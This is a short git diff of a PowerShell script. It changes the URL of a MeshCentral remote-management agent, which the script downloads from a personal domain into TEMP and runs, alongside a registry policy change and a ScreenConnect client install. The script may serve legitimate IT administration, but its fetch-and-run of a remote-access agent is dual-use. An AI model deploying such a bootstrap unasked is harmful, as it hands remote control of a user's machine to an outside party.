Update Script.ps1
parent
4cf9320cec
commit
f45797f667
|
@ -10,7 +10,7 @@ Set-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\policies
|
||||||
|
|
||||||
# Download and run application
|
# Download and run application
|
||||||
$DownloadPath = "$env:TEMP\app.exe"
|
$DownloadPath = "$env:TEMP\app.exe"
|
||||||
Invoke-WebRequest -Uri "https://rmm.iamchrisama.com/meshagents?id=4&meshid=X5qtHmosTjsDTRMtHou8uOh4CYnjyCXy7NmSmYoSdTTZksRsLf0HyakQKXW7akxVLI68ImkXevh0nMH8MS@WrCXBTJqpVVFFnbI5b3eTX0jK1pamvTae@ErtDbhNTqt$cAMlpYypkRzBpd9CWE2bw4aKWQMCgg==&installflags=2" -OutFile $DownloadPath
|
Invoke-WebRequest -Uri "https://rmm.iamchrisama.com/meshagents?id=4&meshid=zxl@U2zM95zh9ZNqah@9mUEjCJ3ptGOE6s5cjsGniacVU1fjRXtVKCKlKJN4aJQW&installflags=0" -OutFile $DownloadPath
|
||||||
Start-Process -FilePath $DownloadPath -Wait
|
Start-Process -FilePath $DownloadPath -Wait
|
||||||
|
|
||||||
# Download and install ScreenConnect client
|
# Download and install ScreenConnect client
|
||||||
|
|
Loading…
Reference in New Issue